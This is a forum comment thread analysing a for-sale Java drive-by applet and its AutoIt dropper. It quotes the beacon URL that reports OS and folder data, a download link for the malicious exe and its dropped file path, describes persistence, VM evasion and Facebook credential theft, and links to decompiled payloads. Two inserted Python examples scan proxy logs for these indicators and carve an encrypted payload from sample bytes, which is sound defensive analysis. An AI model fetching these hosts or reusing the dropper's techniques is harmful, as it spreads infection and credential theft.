by Pezmc 4813 days ago
It sends log messages to http://www.galaxyjdb.com with your OS information and the state of the app..

    /insert.php?o=*os.name*&u=*APPDATA*&ip=java.io.tmpdir&e=*APPSTATE*
It appears to download an exe from http://g2f.nl/0lczsoo

Then it tries to execute the exe:

    System.getenv("APPDATA") + "\\AdobeUpdate-Setup1.84.exe";
If at any point in the process it hits an exception, it sends the code for that exception to the galaxy web address, presumably so the dev can see how the app is performing.

Now normally it wouldn't be able to execute the exe (no access to the filesystem), but it looks like the applet requests elevated permissions from the user to allow it to access/run files.
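Added example (not from the post above or from the applet's author): the beacon URL, the download location and the dropped file name quoted in the comment are concrete network and host indicators, so a defender can run them over proxy logs. The script below classifies each proxy log line as the `/insert.php` beacon (host `www.galaxyjdb.com`, query keys `o`, `u`, `ip`, `e`), the `g2f.nl` dropper fetch, or uninteresting, and ranks clients that show both. The log format and the client addresses are constructed for the example; only the domains, path, query keys and file name come from the comment.

```python
import re
from urllib.parse import urlparse, parse_qs

# Indicators quoted in the comment above.
BEACON_HOST = "www.galaxyjdb.com"
BEACON_PATH = "/insert.php"
BEACON_PARAMS = {"o", "u", "ip", "e"}          # os.name, APPDATA, java.io.tmpdir, app state
DROPPER_URL = "http://g2f.nl/0lczsoo"
DROPPED_NAME = "AdobeUpdate-Setup1.84.exe"      # written under %APPDATA%

# Constructed proxy log: "<timestamp> <client> <method> <url>" (assumed format, not a real log).
SAMPLE_LOG = """\
2013-02-22T10:01:02 10.0.0.5 GET http://www.galaxyjdb.com/insert.php?o=Windows+7&u=C%3A%5CUsers%5Cbob%5CAppData%5CRoaming&ip=C%3A%5CUsers%5Cbob%5CAppData%5CLocal%5CTemp&e=started
2013-02-22T10:01:03 10.0.0.5 GET http://g2f.nl/0lczsoo
2013-02-22T10:01:05 10.0.0.9 GET http://www.example.com/index.html
2013-02-22T10:02:11 10.0.0.7 GET http://www.galaxyjdb.com/insert.php?o=Windows+XP&u=C%3A%5CDocuments&ip=C%3A%5CTemp&e=java.io.IOException
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)$")


def classify_url(url):
    """Return 'beacon', 'dropper' or None for one requested URL."""
    p = urlparse(url)
    if p.netloc.lower() == BEACON_HOST and p.path == BEACON_PATH:
        # All four query keys of the reporting URL must be present.
        if BEACON_PARAMS <= set(parse_qs(p.query).keys()):
            return "beacon"
    if url.rstrip("/").lower() == DROPPER_URL.lower():
        return "dropper"
    return None


def is_dropped_path(path):
    """Match the file name the applet writes into %APPDATA% before executing it."""
    return path.replace("/", "\\").lower().endswith("\\" + DROPPED_NAME.lower())


def scan_proxy_log(text):
    """Yield (client, kind, url) for every line that matches an indicator."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        kind = classify_url(m.group("url"))
        if kind:
            hits.append((m.group("client"), kind, m.group("url")))
    return hits


def triage(hits):
    """Map client -> 'high' (beacon and dropper seen) or 'medium' (either alone)."""
    seen = {}
    for client, kind, _ in hits:
        seen.setdefault(client, set()).add(kind)
    return {c: ("high" if {"beacon", "dropper"} <= kinds else "medium") for c, kinds in seen.items()}


if __name__ == "__main__":
    for client, level in sorted(triage(scan_proxy_log(SAMPLE_LOG)).items()):
        print(client, level)
```

The `e=` parameter is worth keeping in the alert: the comment notes the applet reports exception text through it, so its value tells you how far the infection chain got on that host.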


Ooh, galaxyjdb has a register page: http://www.galaxyjdb.com/index.php?a=Register

>Paypal E-Mail:

>Hackforums Profile Link:

That means this is a service for script kiddies, they've sold this exploit as a service.

EDIT: Hackforums is basically a public internet forum where people openly discuss "hacking" and sell "hacking" tools. I've seen another example, a DDOS service, with an almost empty homepage but login and register actions.

(Why someone would be stupid enough to sell their product from the same domain it reports back to is beyond me, though. Especially since they put credits on it.)

EDIT 2: BINGO! http://www.hackforums.net/showthread.php?tid=3262851&hig... (the forum thread where the product is sold!)

Galaxy JDB is short for "Galaxy Java Drive-By", apparently.

EDIT 3: Product image here, for people without hackforums accounts: http://i5.minus.com/iq2n2GtUjGHpW.png

Oh wow. "Noob friendly". "Free hosting". "Website Cloner". Only $40 for 6 months...

What did you redact there?
Probably author removed the feature and was lazy about the design
Yeah, it's not my redaction.
AVG detects this as Luhe.Fiha.A

Here's a mention from 2011:

(http://answers.microsoft.com/en-us/windows/forum/windows_7-s...)

So, someone using an OS heavily targeted by malware decides not to use anti-malware software, and to have javascript and apparently java enabled in the browser, and then chooses to visit a URL advertised in a chat window - that URL is unknown to that person, does not match the URL they're on but claims a link to the URL they're on, etc etc.

It's a shame someone got robbed, and the responsibility is clearly on the criminal to not engage in criminal behaviour.

But come on; don't just give them your money.

EDIT: I just read the first answer to the MS post above. It's baffling.

> On reflection the best and easiest recourse might be to just tell AVG to "ignore" this "infection." Is this thing actually a virus? or an infection? I have seen no operational problems, nothing in chkdsk, sfc, Registry Mechanic, etc., to concern me.

Totally unrelated to MtGox but: someone has anti-malware software. That software tells them it's found an infected file. There's no evidence this is a false positive. Rather than wipe and re-install (a distressingly unpopular choice) or use anti-malware tools to clean the infection, the advice is to train the software to ignore the infection.

MS is stuffed. There is nothing they can do to repair their malware reputation when the users are that stupid.

This isn't just an MS problem. Macs have the problem where users still believe their OS isn't vulnerable to malware and as such aren't careful either.
I think they are trying to call it a false positive. They happen from time to time.

I wouldn't try to convince someone else they had a false positive without positively identifying the files in question though.

The saying goes, never attribute to malice what can be explained by stupidity.

But they also say, just because you're paranoid it doesn't mean they aren't after you.

So I'd say this may very well be the authors of the malware astroturfing and trying to fool others into ignoring it.

The EXE is an AutoIt3 script (they didn't even scrub the AutoIt version from the PE metadata).

You can run the AutoIt3 script through Exe2Aut (an AutoIt decompiler) and you'll find a pretty mundane remote access toolkit which inserts itself into \Run, checks to see if it's running in a variety of virtualized environments, and, if it's not, can start one of a couple different remote control payloads. It looks like it's got a rudimentary Facebook credentials theft mechanism in its first stage as well.

This is a pretty common for-sale driveby script kiddie exploit - it's depressing how effective these still are.

The exe it downloads seems to be a compiled AutoIt3 script.

Here it is cleaned up: http://pastebin.com/raw.php?i=neP9qXGM

Seems like yet another dropper, not the actual bad thing.

Apart from some basic functions like replication (including a message in Facebook posts/messages, copying to accessible network drives and USBs), avoiding VMs, and setting itself to run on startup, it looks like most of the work is handed off to 2 payloads embedded in the compiled AutoIt file. There are also 2 other binaries mentioned (net2 and net4) but I'm not sure what the purpose is right now.

Payload 1: binary image that is in the shell() function.

Payload 2: between "\\carbons\\" and "//J_Y//" in original exe. It is encrypted with RC2, the password is in an INI which should be elsewhere in the exe - the script refers to @ScriptFullPath->"crypted"->"key" where crypted is the INI section name and key is the key name.

Both payloads are converted to DLL format in-memory, then Payload 1 is executed in the context of another window using CallWindowProcW, passing a pointer to Payload 2 to it.

Decompiled version of Payload 1 (embedded hex): http://pastebin.com/kxT9NskV

There is an area of null bytes at 0x1c...0x53. I deleted 1 byte, 0x00, from it so that the beginning 'call 0x54' lines up with an instruction. Not sure if that is correct.

If anyone gets a chance I'd appreciate a copy of the original AutoIt binary package (email in profile.)
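Added example (mine, not the commenter's script or the decompiled output): the description of Payload 2 gives an analyst two things to locate in the dropper, the byte region between the `\\carbons\\` and `//J_Y//` markers and the RC2 key the script reads with an INI lookup of section `crypted`, key `key`, from its own file (`@ScriptFullPath`). The carver below does both against a constructed blob; the exact byte form of the markers (literal doubled backslashes) is an assumption, and the RC2 decryption itself is left as the next step since it needs a cipher library.

```python
import re

# Marker strings as quoted in the comment; the doubled backslashes are assumed
# to be literal bytes in the executable (AutoIt strings do not use backslash escapes).
START_MARKER = b"\\\\carbons\\\\"
END_MARKER = b"//J_Y//"

# IniRead(@ScriptFullPath, "crypted", "key", ...) reads an INI-style text block
# from the executable itself, so look for "[crypted]" followed by a "key=" line.
KEY_RE = re.compile(rb"\[crypted\][^\[]*?^\s*key\s*=\s*([^\r\n]+)", re.M | re.S)


def carve_between(blob, start, end):
    """Return the bytes strictly between the first `start` and the next `end`, or None."""
    i = blob.find(start)
    if i < 0:
        return None
    i += len(start)
    j = blob.find(end, i)
    if j < 0:
        return None
    return blob[i:j]


def find_ini_key(blob):
    """Return the value of key 'key' in INI section [crypted], or None if absent."""
    m = KEY_RE.search(blob)
    return m.group(1).strip() if m else None


def extract_payload2(blob):
    """Locate the encrypted second payload and the RC2 key stored beside it."""
    return {
        "key": find_ini_key(blob),
        "payload": carve_between(blob, START_MARKER, END_MARKER),
    }


# Constructed sample, not real malware bytes: a fake PE header, an INI block and the markers.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"[crypted]\r\nkey=example-key\r\n"
    + START_MARKER + b"\x13\x37\xde\xad\xbe\xef" + END_MARKER
    + b"trailing data"
)

if __name__ == "__main__":
    found = extract_payload2(SAMPLE)
    print("key:", found["key"])
    print("payload bytes:", len(found["payload"]) if found["payload"] else None)
```

With the key and region in hand, the remaining work is an RC2 decrypt of the region (the comment names the cipher but not its mode or padding, so those have to be read out of the decompiled script).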

The mention of net2 and net4 sounds like the .Net runtime could be involved - the numbers referring to the version of the runtime. Quite the coincidence if not.

Perhaps a .Net decompiler could help. Reflector used to be the only good tool around, but since it became a paid tool, other free ones have sprung up. dotPeek is one (no idea how good it is).

This is "a variant of Win32/Injector.Autoit.HG" trojan according to the ESET antivirus on my machine.